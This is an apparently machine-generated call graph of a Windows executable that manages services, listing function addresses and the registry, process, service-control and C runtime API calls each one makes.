12426->12428 12430 4052c0 107 API calls 12427->12430 12428->12428 12431 40a95f RegSetValueExW RegSetValueExW 12428->12431 12432 412cdc __fputwc_nolock 5 API calls 12429->12432 12433 40a903 12430->12433 12434 412cdc __fputwc_nolock 5 API calls 12431->12434 12435 40a8c8 12432->12435 12436 405400 3 API calls 12433->12436 12437 40a9b6 12434->12437 12435->12053 12438 40a918 12436->12438 12437->12053 12439 412cdc __fputwc_nolock 5 API calls 12438->12439 12440 40a92e 12439->12440 12440->12053 12442 40ef56 12441->12442 12443 40ef36 12441->12443 12445 40ca70 4 API calls 12442->12445 12444 4098d0 116 API calls 12443->12444 12446 40ef3d 12444->12446 12447 40ef62 12445->12447 12450 412cdc __fputwc_nolock 5 API calls 12446->12450 12448 40ef6b __flswbuf 12447->12448 12449 40ef9c 12447->12449 12771 405470 12448->12771 12777 40cab0 OpenServiceW 12449->12777 12451 40ef4f 12450->12451 12451->12070 12455 40f003 12458 40f00b StartServiceW GetLastError CloseServiceHandle 12455->12458 12459 40f10f 12455->12459 12456 40eff4 CloseServiceHandle 12494 40f091 12456->12494 12462 40f038 12458->12462 12463 40f03c 12458->12463 12464 40f175 ControlService GetLastError CloseServiceHandle 12459->12464 12465 40f119 QueryServiceStatus GetLastError 12459->12465 12460 412cdc __fputwc_nolock 5 API calls 12466 40ef95 12460->12466 12461 412cdc __fputwc_nolock 5 API calls 12467 40f0ab 12461->12467 12807 40c560 QueryServiceStatus 12462->12807 12463->12462 12470 40f0dd CloseServiceHandle 12463->12470 12468 40f1a2 12464->12468 12469 40f1a6 12464->12469 12471 40f14b 12465->12471 12472 40f12c 12465->12472 12466->12070 12467->12070 12477 40c560 3 API calls 12468->12477 12469->12468 12474 40f21b CloseServiceHandle 12469->12474 12475 4052c0 107 API calls 12470->12475 12476 4052c0 107 API calls 12471->12476 12482 413c2a _printf 103 API calls 12472->12482 12479 4052c0 107 API calls 12474->12479 12483 40f0e6 __flswbuf 12475->12483 12484 40f151 __flswbuf 12476->12484 12480 40f1bc CloseServiceHandle 12477->12480 12493 40f224 __flswbuf 12479->12493 12491 40f1cc 12480->12491 12481 40f0b2 12485 4052c0 107 API calls 12481->12485 12482->12494 12826 413b96 12483->12826 12487 413b96 _fwprintf 103 API calls 12484->12487 12488 40f0b8 12485->12488 12486 4052c0 107 API calls 12489 40f1f4 12486->12489 12487->12494 12811 413c2a 12488->12811 12497 413c2a _printf 103 API calls 12489->12497 12491->12486 12492 40f060 __flswbuf 12498 405470 109 API calls 12492->12498 12496 413b96 _fwprintf 103 API calls 12493->12496 12494->12461 12496->12494 12497->12494 12498->12494 12500 4099ab __flswbuf 12499->12500 12501 405470 109 API calls 12500->12501 12502 4099b4 _memset 12501->12502 12503 4099c2 GetProcessHeap HeapAlloc 12502->12503 12504 409a20 GetModuleFileNameW GetProcessHeap HeapAlloc 12503->12504 12508 4099f5 __flswbuf 12503->12508 12505 409a40 GetProcessHeap HeapFree 12504->12505 12506 409a5b GetCommandLineW 12504->12506 12505->12508 13003 40d950 GetProcessHeap HeapAlloc 12518->13003 12520 40ff16 12523 40ff2c 12520->12523 12524 40ff1e 12520->12524 12521 40fee7 12521->12520 12522 412731 __snwprintf_s 101 API calls 12521->12522 12522->12520 12525 40ff30 __flswbuf 12523->12525 12526 40ff56 12523->12526 12565 40dabc 12564->12565 12566 40daad 12564->12566 12567 4097b0 79 API calls 12565->12567 12568 4098d0 116 API calls 12566->12568 12570 40dae8 12567->12570 12569 40dab4 12568->12569 12694 409904 12693->12694 12695 4098ee __flswbuf 12693->12695 12696 4054a0 112 API calls 12694->12696 12698 405470 109 API calls 12695->12698 12697 40990d 12696->12697 12697->12066 12699 4098fc 12698->12699 12699->12066 12703 41875b LeaveCriticalSection 12700->12703 12702 413b62 12702->12391 12703->12702 12705 40823e 12704->12705 12706 40821e GetLastError 12704->12706 12705->12403 12710 408250 GetProcAddress 12705->12710 12707 4052c0 107 API calls 12706->12707 12708 40822d 12707->12708 12709 405400 3 API calls 12708->12709 12709->12705 12711 408279 GetLastError 12710->12711 12719 408302 12710->12719 12723 413380 12711->12723 12714 4082b6 12717 413380 __cftoe 81 API calls 12714->12717 12715 4082cc 12716 4082ef 12715->12716 12718 4052c0 107 API calls 12715->12718 12716->12719 12720 4082f6 GetProcessHeap HeapFree 12716->12720 12717->12715 12721 4082de 12718->12721 12719->12409 12719->12410 12720->12719 12722 405400 3 API calls 12721->12722 12722->12716 12726 413270 12723->12726 12727 413286 12726->12727 12728 4132b0 12727->12728 12729 41328b 12727->12729 12732 412ac5 _LocaleUpdate::_LocaleUpdate 77 API calls 12728->12732 12730 4154f0 __lseeki64_nolock 67 API calls 12729->12730 12731 413297 12730->12731 12733 415488 __setmode 6 API calls 12731->12733 12734 4132ca 12732->12734 12735 408294 GetProcessHeap HeapAlloc 12733->12735 12736 4132e5 12734->12736 12737 4132dc 12734->12737 12735->12714 12735->12715 12747 4130cf 12736->12747 12739 4154f0 __lseeki64_nolock 67 API calls 12737->12739 12746 4132e1 12739->12746 12740 4132f3 12741 4132fb 12740->12741 12743 413319 12740->12743 12744 4154f0 __lseeki64_nolock 67 API calls 12741->12744 12742 415488 __setmode 6 API calls 12742->12735 12743->12735 12745 4154f0 __lseeki64_nolock 67 API calls 12743->12745 12744->12735 12745->12746 12746->12742 12748 4130e5 12747->12748 12749 413100 12748->12749 12750 41311d 12748->12750 12764 4130ea _strlen 12748->12764 12751 4154f0 __lseeki64_nolock 67 API calls 12749->12751 12752 412ac5 _LocaleUpdate::_LocaleUpdate 77 API calls 12750->12752 12753 413105 12751->12753 12754 413128 12752->12754 12755 415488 __setmode 6 API calls 12753->12755 12756 413220 12754->12756 12757 413133 12754->12757 12755->12764 12759 41322e MultiByteToWideChar 12756->12759 12756->12764 12758 413180 MultiByteToWideChar 12757->12758 12757->12764 12760 41319c GetLastError 12758->12760 12758->12764 12761 413242 12759->12761 12759->12764 12762 4131a7 12760->12762 12770 4131bc 12760->12770 12763 4154f0 __lseeki64_nolock 67 API calls 12761->12763 12765 4154f0 __lseeki64_nolock 67 API calls 12762->12765 12763->12764 12764->12740 12765->12764 12766 4131f0 MultiByteToWideChar 12766->12764 12767 41320b 12766->12767 12769 4154f0 __lseeki64_nolock 67 API calls 12767->12769 12768 4178eb __isleadbyte_l 77 API calls 12768->12770 12769->12764 12770->12766 12770->12767 12770->12768 12841 405370 GetUserDefaultLangID FormatMessageW 12771->12841 12774 40549e 12774->12460 12778 40cb41 GetLastError 12777->12778 12779 40cafb 12777->12779 12780 40cb50 GetLastError 12778->12780 12781 40cb79 12778->12781 12782 40cb03 GetServiceDisplayNameW GetServiceKeyNameW 12779->12782 12783 40cb3a 12779->12783 12784 4052c0 107 API calls 12780->12784 12781->12780 12785 40cb7d EnumServicesStatusW GetLastError 12781->12785 12782->12783 12788 412cdc __fputwc_nolock 5 API calls 12783->12788 12794 40cb58 __flswbuf 12784->12794 12786 40cbb0 GetProcessHeap HeapAlloc 12785->12786 12787 40cc82 GetLastError 12785->12787 12789 40cbca __flswbuf 12786->12789 12799 40cbf1 12786->12799 12791 4052c0 107 API calls 12787->12791 12790 40cd27 12788->12790 12795 405470 109 API calls 12789->12795 12790->12455 12790->12456 12791->12794 12792 40cc00 EnumServicesStatusW 12793 40cc2a GetLastError 12792->12793 12792->12799 12796 40cc72 GetProcessHeap HeapFree 12793->12796 12793->12799 12797 405470 109 API calls 12794->12797 12795->12783 12796->12787 12797->12783 12798 40ccfb 12801 40cab0 117 API calls 12798->12801 12799->12792 12799->12798 12800 4097b0 79 API calls 12799->12800 12802 40cc98 12799->12802 12800->12799 12801->12783 12803 412731 __snwprintf_s 101 API calls 12802->12803 12804 40ccb9 12803->12804 12805 40ccc3 GetProcessHeap HeapFree 12804->12805 12806 40ccdf GetProcessHeap HeapFree 12804->12806 12805->12806 12806->12798 12808 40c591 CloseServiceHandle 12807->12808 12809 40c570 12807->12809 12808->12481 12808->12492 12809->12808 12810 40c5d7 Sleep QueryServiceStatus 12809->12810 12810->12808 12810->12809 12812 413c36 __mtinitlocknum 12811->12812 12813 413c61 __flswbuf 12812->12813 12814 413c44 12812->12814 12897 412694 12813->12897 12815 4154f0 __lseeki64_nolock 67 API calls 12814->12815 12816 413c49 12815->12816 12817 415488 __setmode 6 API calls 12816->12817 12820 413c59 __mtinitlocknum 12817->12820 12819 413c73 __flswbuf 12821 4169a8 __stbuf 67 API calls 12819->12821 12820->12494 12822 413c85 __flswbuf 12821->12822 12823 416a44 __ftbuf 101 API calls 12822->12823 12824 413cae 12823->12824 12828 413ba2 __mtinitlocknum 12826->12828 12827 413bb2 12830 4154f0 __lseeki64_nolock 67 API calls 12827->12830 12828->12827 12829 413bdb 12828->12829 12831 412653 __lock_file 68 API calls 12829->12831 12832 413bb7 12830->12832 12833 413be4 12831->12833 12834 415488 __setmode 6 API calls 12832->12834 12835 4169a8 __stbuf 67 API calls 12833->12835 12837 413bc7 __mtinitlocknum 12834->12837 12836 413bee 12835->12836 12838 416a44 __ftbuf 101 API calls 12836->12838 12837->12494 12839 413c08 12838->12839 12912 413c20 12839->12912 12842 4053a1 FormatMessageW 12841->12842 12845 4053e1 12841->12845 12843 4053ba GetProcessHeap HeapAlloc 12842->12843 12842->12845 12844 412731 __snwprintf_s 101 API calls 12843->12844 12844->12845 12845->12774 12846 412e2d 12845->12846 12849 412d9a 12846->12849 12848 405494 LocalFree 12848->12774 12850 412da6 __mtinitlocknum 12849->12850 12851 412db6 12850->12851 12853 412ddf 12850->12853 12852 4154f0 __lseeki64_nolock 67 API calls 12851->12852 12854 412dbb 12852->12854 12864 412653 12853->12864 12856 415488 __setmode 6 API calls 12854->12856 12860 412dcb __mtinitlocknum 12856->12860 12860->12848 12865 412665 12864->12865 12866 412687 EnterCriticalSection 12864->12866 12865->12866 12867 41266d 12865->12867 12868 41267d 12866->12868 12869 4145cc __lock 67 API calls 12867->12869 12870 4169a8 12868->12870 12869->12868 12871 413b64 __fileno 67 API calls 12870->12871 12872 4169b7 12871->12872 12873 41a6b2 __write_nolock 67 API calls 12872->12873 12875 4169bd __flswbuf 12873->12875 12874 412df2 12877 416a44 12874->12877 12875->12874 12876 4140b1 __malloc_crt 67 API calls 12875->12876 12876->12874 12878 416a4f 12877->12878 12880 412e0b 12877->12880 12878->12880 12884 4142bd 12878->12884 12881 412e23 12880->12881 12890 4126c6 12881->12890 12883 412e2b 12883->12860 12885 4142f8 12884->12885 12886 4142d6 12884->12886 12885->12880 12886->12885 12887 413b64 __fileno 67 API calls 12886->12887 12888 4142f1 12887->12888 12889 41a30e __locking 101 API calls 12888->12889 12889->12885 12891 4126d7 12890->12891 12892 4126f6 LeaveCriticalSection 12890->12892 12891->12892 12893 4126de 12891->12893 12892->12883 12898 4126a1 12897->12898 12899 4126b7 EnterCriticalSection 12897->12899 12900 4145cc __lock 67 API calls 12898->12900 12899->12819 12901 4126aa 12900->12901 12901->12819 12913 4126c6 _fwprintf 2 API calls 12912->12913 12914 413c28 12913->12914 12914->12837 13004 40d982 13003->13004 13005 40d96b 13003->13005 13004->12521 13006 405400 3 API calls 13005->13006 13006->13004 13859 4161dc 13842->13859 13844 41396b __init_pointers __initp_misc_winsig 13862 418176 13844->13862 13847 41616a __encode_pointer 6 API calls 13848 4139a7 13847->13848 13848->12186 13850 41445b 13849->13850 13851 418527 __mtinitlocknum InitializeCriticalSectionAndSpinCount 13850->13851 13852 414489 13850->13852 13851->13850 13852->12176 13852->12196 13854 4162aa 13853->13854 13855 41629e 13853->13855 13856 4162cc 13854->13856 13857 4162be TlsFree 13854->13857 13858 4161e5 __decode_pointer 6 API calls 13855->13858 13856->13856 13857->13856 13858->13854 13860 41616a __encode_pointer 6 API calls 13859->13860 13861 4161e3 13860->13861 13861->13844 13863 41616a __encode_pointer 6 API calls 13862->13863 13864 41399d 13863->13864 13864->13847 10034 40fb20 10055 40f580 10034->10055 10036 40fb3a 10037 40fb43 10036->10037 10038 40fb87 10036->10038 10150 412731 10037->10150 10040 405400 3 API calls 10038->10040 10042 40fbaf RegisterWaitForSingleObject 10040->10042 10043 40fbd4 GetLastError 10042->10043 10044 40fbf6 10042->10044 10165 4052c0 TlsGetValue 10043->10165 10047 412cdc __fputwc_nolock 5 API calls 10044->10047 10050 40fc06 10047->10050 10049 40fbe1 10052 405400 3 API calls 10049->10052 10054 40fbf3 10052->10054 10053 40fb83 10054->10044 10056 40f58a __write_nolock 10055->10056 10057 40f5b7 10056->10057 10058 40f5cf _memset 10056->10058 10059 412cdc __fputwc_nolock 5 API calls 10057->10059 10174 40bec0 10058->10174 10060 40f5c8 10059->10060 10060->10036 10062 40f602 10063 40f640 10062->10063 10064 40f609 10062->10064 10066 412731 __snwprintf_s 101 API calls 10063->10066 10065 405400 3 API calls 10064->10065 10067 40f61b 10065->10067 10068 40f668 10066->10068 10393 40e6e0 10067->10393 10070 40f6ad 10068->10070 10071 40f66f 10068->10071 10276 40e830 10070->10276 10074 405400 3 API calls 10071->10074 10077 40f687 10074->10077 10075 40f6b3 10079 40f6c6 10075->10079 10411 405190 10075->10411 10076 412cdc __fputwc_nolock 5 API calls 10080 40f639 10076->10080 10078 40e6e0 951 API calls 10077->10078 10081 40f693 10078->10081 10083 40f6d9 10079->10083 10416 405140 10079->10416 10080->10036 10084 412cdc __fputwc_nolock 5 API calls 10081->10084 10302 409270 10083->10302 10088 40f6a6 10084->10088 10087 40f6e7 10089 40f742 CreateProcessW 10087->10089 10090 40f6ee 10087->10090 10088->10036 10094 40f7fb 10089->10094 10095 40f79c GetLastError 10089->10095 10091 405400 3 API calls 10090->10091 10092 40f700 10091->10092 10096 40f712 10092->10096 10097 40f70c FreeConsole 10092->10097 10377 409f50 GetProcessTimes 10094->10377 10098 4052c0 107 API calls 10095->10098 10099 408bb0 3 API calls 10096->10099 10097->10096 10102 40f7aa 10098->10102 10103 40f71c 10099->10103 10101 40f81c 10386 408bb0 10101->10386 10104 405400 3 API calls 10102->10104 10105 40e6e0 951 API calls 10103->10105 10107 40f7bf 10104->10107 10108 40f728 10105->10108 10110 408bb0 3 API calls 10107->10110 10111 412cdc __fputwc_nolock 5 API calls 10108->10111 10114 40f7c9 10110->10114 10115 40f73b 10111->10115 10112 40f840 FreeConsole 10113 40f846 10112->10113 10116 405290 128 API calls 10113->10116 10419 405290 10114->10419 10115->10036 10118 40f852 10116->10118 10120 40f904 10118->10120 10121 40f867 GetProcessAffinityMask 10118->10121 10123 40f973 WaitForSingleObject SetServiceStatus 10120->10123 10128 412731 __snwprintf_s 101 API calls 10120->10128 10124 40f898 GetLastError 10121->10124 10145 40f888 SetProcessAffinityMask 10121->10145 10122 40e6e0 951 API calls 10125 40f7e1 10122->10125 10126 40f9c7 10123->10126 10127 40f9ad 10123->10127 10130 4052c0 107 API calls 10124->10130 10131 412cdc __fputwc_nolock 5 API calls 10125->10131 10139 412cdc __fputwc_nolock 5 API calls 10126->10139 10127->10126 10132 40f9b7 WaitForSingleObject 10127->10132 10135 40f929 10128->10135 10136 40f8ac 10130->10136 10137 40f7f4 10131->10137 10132->10126 10133 40f8f9 ResumeThread 10133->10120 10134 40f8d9 GetLastError 10138 4052c0 107 API calls 10134->10138 10140 412731 __snwprintf_s 101 API calls 10135->10140 10141 405400 3 API calls 10136->10141 10137->10036 10142 40f8e2 10138->10142 10143 40fa01 10139->10143 10144 40f944 10140->10144 10141->10145 10146 405400 3 API calls 10142->10146 10143->10036 10147 405400 3 API calls 10144->10147 10145->10133 10145->10134 10148 40f8f6 10146->10148 10149 40f96b 10147->10149 10148->10133 10149->10123 11660 412f44 10150->11660 10153 405400 RegisterEventSourceW 10154 405466 10153->10154 10155 405417 ReportEventW DeregisterEventSource 10153->10155 10157 412cdc 10154->10157 10155->10154 10158 412ce4 10157->10158 10159 412ce6 IsDebuggerPresent 10157->10159 10158->10053 11919 41aa85 10159->11919 10162 416889 SetUnhandledExceptionFilter UnhandledExceptionFilter 10163 4168a6 __invoke_watson 10162->10163 10164 4168ae GetCurrentProcess TerminateProcess 10162->10164 10163->10164 10164->10053 10166 4052d3 LocalAlloc 10165->10166 10167 4052fb GetUserDefaultLangID FormatMessageW 10165->10167 10168 4052e6 10166->10168 10169 4052ed TlsSetValue 10166->10169 10170 405327 FormatMessageW 10167->10170 10171 40534f 10167->10171 10168->10049 10169->10167 10170->10171 10172 40533c 10170->10172 10171->10049 10173 412731 __snwprintf_s 101 API calls 10172->10173 10173->10171 10175 40beca __write_nolock 10174->10175 10425 40b440 10175->10425 10178 40bf14 10428 40ace0 GetProcessHeap HeapAlloc 10178->10428 10179 40bef9 10180 412cdc __fputwc_nolock 5 API calls 10179->10180 10182 40bf0d 10180->10182 10182->10062 10183 40bf43 10184 40bf4a RegCloseKey 10183->10184 10185 40bf6e 10183->10185 10187 412cdc __fputwc_nolock 5 API calls 10184->10187 10186 40ace0 123 API calls 10185->10186 10188 40bf8f 10186->10188 10189 40bf67 10187->10189 10190 405400 3 API calls 10188->10190 10192 40bfb1 _memset 10188->10192 10189->10062 10190->10192 10191 40ace0 123 API calls 10193 40bfe1 10191->10193 10192->10191 10194 40c06f 10193->10194 10195 412731 __snwprintf_s 101 API calls 10193->10195 10196 40ace0 123 API calls 10194->10196 10197 40c00b 10195->10197 10198 40c08d 10196->10198 10200 40c05a 10197->10200 10201 40c01b GetWindowsDirectoryW 10197->10201 10199 40c0cd 10198->10199 10513 40c820 10198->10513 10456 40ab70 RegQueryValueExW 10199->10456 10205 405400 3 API calls 10200->10205 10202 40c032 10201->10202 10203 40c02b 10201->10203 10207 405400 3 API calls 10202->10207 10203->10200 10203->10202 10205->10194 10210 40c046 RegCloseKey 10207->10210 10208 40c1d6 10211 40ab70 120 API calls 10208->10211 10209 40c0b4 10212 40c0e3 GetCurrentProcess GetProcessAffinityMask 10209->10212 10213 40c0bb 10209->10213 10216 40c541 10210->10216 10217 40c1f0 10211->10217 10212->10199 10215 40c102 10212->10215 10214 405400 3 API calls 10213->10214 10214->10199 10215->10199 10218 40c12e 10215->10218 10219 412cdc __fputwc_nolock 5 API calls 10216->10219 10481 40af80 RegQueryValueExW 10217->10481 10518 40c610 10218->10518 10222 40c553 10219->10222 10222->10062 10223 40c142 10226 40c198 GetProcessHeap HeapFree 10223->10226 10228 40c610 107 API calls 10223->10228 10224 40c21f 10225 40af80 112 API calls 10224->10225 10227 40c250 10225->10227 10226->10199 10233 40af80 112 API calls 10227->10233 10230 40c15d 10228->10230 10229 40c202 10229->10224 10232 405400 3 API calls 10229->10232 10231 40c184 GetProcessHeap HeapFree 10230->10231 10234 405400 3 API calls 10230->10234 10231->10226 10232->10224 10236 40c280 10233->10236 10235 40c181 10234->10235 10235->10231 10237 40af80 112 API calls 10236->10237 10238 40c2bf 10237->10238 10239 40af80 112 API calls 10238->10239 10240 40c2e2 10239->10240 10241 40af80 112 API calls 10240->10241 10242 40c305 10241->10242 10243 40af80 112 API calls 10242->10243 10244 40c328 GetCurrentDirectoryW SetCurrentDirectoryW 10243->10244 10490 40b460 10244->10490 10247 40c360 10248 40c394 SetCurrentDirectoryW 10247->10248 10249 40c367 10247->10249 10499 40b240 RegQueryValueExW 10248->10499 10251 405400 3 API calls 10249->10251 10252 40c376 RegCloseKey SetCurrentDirectoryW 10251->10252 10252->10216 10254 40b240 112 API calls 10255 40c3d5 RegQueryValueExW 10254->10255 10256 40c42f 10255->10256 10257 40c40b 10255->10257 10260 40b240 112 API calls 10256->10260 10257->10256 10258 40c434 GetLastError 10257->10258 10259 40c418 10257->10259 10262 4052c0 107 API calls 10258->10262 10261 405400 3 API calls 10259->10261 10263 40c499 10260->10263 10261->10256 10264 40c440 10262->10264 10265 40b240 112 API calls 10263->10265 10266 405400 3 API calls 10264->10266 10267 40c4b6 10265->10267 10268 40c455 10266->10268 10269 40b240 112 API calls 10267->10269 10268->10256 10270 40c4d3 10269->10270 10528 40b5d0 10270->10528 10272 40c538 RegCloseKey 10272->10216 10273 40c4f2 10273->10272 10275 40c530 10273->10275 10554 412c36 10273->10554 10275->10272 10277 40e9e5 10276->10277 10280 40e85a 10276->10280 10278 412cdc __fputwc_nolock 5 API calls 10277->10278 10279 40e9f1 10278->10279 10279->10075 10281 412731 __snwprintf_s 101 API calls 10280->10281 10282 40e8a8 10281->10282 10283 40e8d8 10282->10283 10284 40e8bc 10282->10284 10285 412731 __snwprintf_s 101 API calls 10283->10285 10286 405400 3 API calls 10284->10286 10287 40e8f2 10285->10287 10289 40e8d3 10286->10289 10288 405400 3 API calls 10287->10288 10288->10289 10290 40e929 10289->10290 10291 40e91a EnterCriticalSection 10289->10291 10292 40e962 SetServiceStatus 10290->10292 10295 40e947 SetWaitableTimer 10290->10295 10291->10292 10293 40e9b7 10292->10293 10294 40e989 SleepConditionVariableCS LeaveCriticalSection 10292->10294 10297 40e9c1 WaitForSingleObject 10293->10297 10298 40e9dc Sleep 10293->10298 10296 412cdc __fputwc_nolock 5 API calls 10294->10296 10295->10292 10299 40e9b3 10296->10299 10300 412cdc __fputwc_nolock 5 API calls 10297->10300 10298->10277 10299->10075 10301 40e9d8 10300->10301 10301->10075 10303 409279 10302->10303 10304 40927e 10302->10304 10303->10087 11122 401b20 10304->11122 10307 409299 CreateFileW 10308 4092ec 10307->10308 10311 4092c2 GetLastError 10307->10311 10309 409464 10308->10309 10310 409307 10308->10310 10316 409681 10309->10316 11268 4097b0 10309->11268 10312 40932f 10310->10312 11209 4089b0 10310->11209 10313 4052c0 107 API calls 10311->10313 11239 408870 CreateFileW 10312->11239 10317 4092cf 10313->10317 10319 40979a 10316->10319 10324 4096f0 10316->10324 10325 4096a4 GetCurrentProcess GetStdHandle GetCurrentProcess DuplicateHandle 10316->10325 10320 405400 3 API calls 10317->10320 10319->10087 10321 4092e0 10320->10321 10321->10087 10322 40944b 10322->10087 10323 40948b 10329 409516 10323->10329 10330 409496 GetCurrentProcess GetCurrentProcess DuplicateHandle 10323->10330 10326 409745 10324->10326 10327 4096f9 GetCurrentProcess GetStdHandle GetCurrentProcess DuplicateHandle 10324->10327 10325->10324 10331 4096bc GetLastError 10325->10331 10326->10319 10336 40974e GetCurrentProcess GetStdHandle GetCurrentProcess DuplicateHandle 10326->10336 10327->10326 10334 409711 GetLastError 10327->10334 10328 4093f0 10328->10309 10339 409403 GetCurrentProcess GetCurrentProcess DuplicateHandle 10328->10339 10333 409544 10329->10333 10341 4089b0 124 API calls 10329->10341 10330->10316 10337 4094e2 GetLastError 10330->10337 10332 4052c0 107 API calls 10331->10332 10340 4096c9 10332->10340 10343 408870 114 API calls 10333->10343 10342 4052c0 107 API calls 10334->10342 10335 40934f 10335->10322 10335->10328 11248 409130 10335->11248 10336->10319 10345 409766 GetLastError 10336->10345 10338 4052c0 107 API calls 10337->10338 10346 4094ef 10338->10346 10347 409424 GetLastError 10339->10347 10348 409458 10339->10348 10349 405400 3 API calls 10340->10349 10341->10333 10350 40971e 10342->10350 10367 40956a 10343->10367 10352 4052c0 107 API calls 10345->10352 10353 405400 3 API calls 10346->10353 10354 4052c0 107 API calls 10347->10354 10348->10309 10355 4096e3 10349->10355 10356 405400 3 API calls 10350->10356 10351 4093d0 10351->10328 10358 4093dd CloseHandle CloseHandle 10351->10358 10359 409773 10352->10359 10361 409509 10353->10361 10362 409431 10354->10362 10355->10087 10363 409738 10356->10363 10357 40965e 10357->10087 10358->10328 10360 405400 3 API calls 10359->10360 10365 40978d 10360->10365 10361->10087 10366 405400 3 API calls 10362->10366 10363->10087 10364 40960d 10364->10316 10368 40961c GetCurrentProcess GetCurrentProcess DuplicateHandle 10364->10368 10365->10087 10366->10322 10367->10357 10367->10364 10369 409130 119 API calls 10367->10369 10370 409677 10368->10370 10371 409637 GetLastError 10368->10371 10372 4095ef 10369->10372 10370->10316 10374 4052c0 107 API calls 10371->10374 10372->10364 10373 4095fc CloseHandle CloseHandle 10372->10373 10373->10364 10375 409644 10374->10375 10376 405400 3 API calls 10375->10376 10376->10357 10378 409f76 GetLastError 10377->10378 10379 409f9f 10377->10379 10380 4052c0 107 API calls 10378->10380 10381 412760 ___sbh_free_block __VEC_memcpy 10379->10381 10382 409f83 10380->10382 10383 409fb0 10381->10383 10384 405400 3 API calls 10382->10384 10383->10101 10385 409f93 10384->10385 10385->10101 10387 408bc3 CloseHandle 10386->10387 10388 408bc6 10386->10388 10387->10388 10389 408bd0 10388->10389 10390 408bcd CloseHandle 10388->10390 10391 408bd7 CloseHandle 10389->10391 10392 408bda 10389->10392 10390->10389 10391->10392 10392->10112 10392->10113 10394 40e707 10393->10394 10395 40e6fa UnregisterWait 10393->10395 10396 40e763 SetServiceStatus 10394->10396 10402 405400 3 API calls 10394->10402 10405 40e753 10394->10405 10395->10394 10397 40e787 10396->10397 10398 40e790 10397->10398 10399 40e7c1 10397->10399 10400 405400 3 API calls 10398->10400 10401 405400 3 API calls 10399->10401 10403 40e7a7 10400->10403 10404 40e7bc 10401->10404 10402->10405 11329 40a460 10403->11329 11346 40fc10 10404->11346 10405->10396 10405->10397 10408 40e7e3 10409 40e825 10408->10409 10410 40e815 SetServiceStatus 10408->10410 10409->10076 10410->10409 11617 405160 GetEnvironmentStringsW 10411->11617 10413 405196 10414 405140 122 API calls 10413->10414 10415 4051a8 10414->10415 10415->10079 10417 405080 122 API calls 10416->10417 10418 40514c 10417->10418 10418->10083 11650 404ee0 10419->11650 10421 40529b 10422 4052bd 10421->10422 10423 405190 124 API calls 10421->10423 10422->10122 10424 4052aa GetProcessHeap HeapFree 10423->10424 10424->10422 10562 40b310 10425->10562 10427 40b451 10427->10178 10427->10179 10429 40ad22 _memset 10428->10429 10430 40acff 10428->10430 10433 40ad31 RegQueryValueExW 10429->10433 10431 405400 3 API calls 10430->10431 10432 40ad16 10431->10432 10432->10183 10434 40ad63 GetLastError GetProcessHeap HeapFree 10433->10434 10435 40adb4 10433->10435 10438 40ad80 10434->10438 10439 40ad87 10434->10439 10436 40adc2 10435->10436 10437 40adbb PathUnquoteSpacesW 10435->10437 10440 40adc9 10436->10440 10443 40ae0a ExpandEnvironmentStringsW 10436->10443 10437->10436 10438->10439 10441 40ae00 10438->10441 10442 4052c0 107 API calls 10439->10442 10587 412760 10440->10587 10441->10183 10444 40ad8f 10442->10444 10447 40ae17 10443->10447 10448 40ae1b GetLastError 10443->10448 10445 405400 3 API calls 10444->10445 10450 40ada4 10445->10450 10447->10448 10452 40adf0 GetProcessHeap RtlFreeHeap 10447->10452 10449 4052c0 107 API calls 10448->10449 10453 40ae29 10449->10453 10450->10183 10452->10441 10454 405400 3 API calls 10453->10454 10455 40ae3a GetProcessHeap HeapFree 10454->10455 10455->10183 10457 40abe7 10456->10457 10458 40ab9f 10456->10458 10461 40abed 10457->10461 10462 40ac1e 10457->10462 10459 40abb4 10458->10459 10460 40abbb GetLastError 10458->10460 10459->10208 10463 4052c0 107 API calls 10460->10463 10464 405400 3 API calls 10461->10464 10462->10459 10467 40ac40 GetProcessHeap HeapAlloc 10462->10467 10468 40ac34 GetProcessHeap HeapFree 10462->10468 10465 40abc9 10463->10465 10466 40ac11 10464->10466 10471 405400 3 API calls 10465->10471 10466->10208 10469 40ac54 10467->10469 10470 40ac77 RegQueryValueExW 10467->10470 10468->10467 10472 405400 3 API calls 10469->10472 10473 40ac90 GetLastError 10470->10473 10474 40acd7 10470->10474 10475 40abda 10471->10475 10476 40ac69 10472->10476 10477 4052c0 107 API calls 10473->10477 10474->10208 10475->10208 10476->10208 10478 40ac9e 10477->10478 10479 405400 3 API calls 10478->10479 10480 40acaf GetProcessHeap HeapFree 10479->10480 10480->10208 10482 40afc2 10481->10482 10483 40afb9 10481->10483 10484 40afd6 GetLastError 10482->10484 10485 40afce 10482->10485 10483->10229 10486 4052c0 107 API calls 10484->10486 10485->10229 10487 40afe4 10486->10487 10488 405400 3 API calls 10487->10488 10489 40aff5 10488->10489 10489->10229 10591 4084d0 10490->10591 10492 40b4a5 10493 40b4ac _memset 10492->10493 10494 4084d0 125 API calls 10492->10494 10493->10247 10495 40b51a 10494->10495 10496 40b521 _memset 10495->10496 10497 4084d0 125 API calls 10495->10497 10496->10247 10498 40b58b _memset 10497->10498 10498->10247 10500 40b2c3 10499->10500 10501 40b28a 10499->10501 10502 412cdc __fputwc_nolock 5 API calls 10500->10502 10501->10500 10504 40b296 10501->10504 10505 40b2c8 GetLastError 10501->10505 10503 40b2fe 10502->10503 10503->10254 10507 412731 __snwprintf_s 101 API calls 10504->10507 10506 4052c0 107 API calls 10505->10506 10508 40b2d6 10506->10508 10509 40b2ae 10507->10509 10510 405400 3 API calls 10508->10510 10511 405400 3 API calls 10509->10511 10512 40b2e7 10510->10512 10511->10500 10512->10500 10514 40c835 10513->10514 10515 40c841 10513->10515 10514->10209 10516 40c92b 10515->10516 10517 409810 78 API calls 10515->10517 10516->10209 10517->10515 10519 40c61e 10518->10519 10521 40c62a 10518->10521 10519->10223 10520 40c63a 10520->10223 10521->10520 10522 40c6d3 GetProcessHeap HeapAlloc 10521->10522 10523 40c7b3 10522->10523 10526 40c70a 10522->10526 10523->10223 10524 412731 101 API calls __snwprintf_s 10524->10526 10525 40c7c0 GetProcessHeap HeapFree 10525->10223 10526->10523 10526->10524 10526->10525 10527 40c7ef GetProcessHeap HeapFree 10526->10527 10527->10223 10529 40b310 113 API calls 10528->10529 10530 40b60e 10529->10530 10531 40b617 10530->10531 10532 40b62d 10530->10532 10534 412cdc __fputwc_nolock 5 API calls 10531->10534 10533 40b641 10532->10533 10536 412731 __snwprintf_s 101 API calls 10532->10536 10535 40b648 RegQueryValueExW 10533->10535 10537 40b629 10534->10537 10538 40b6e0 RegCloseKey 10535->10538 10539 40b66a RegCloseKey 10535->10539 10540 40b6ae 10536->10540 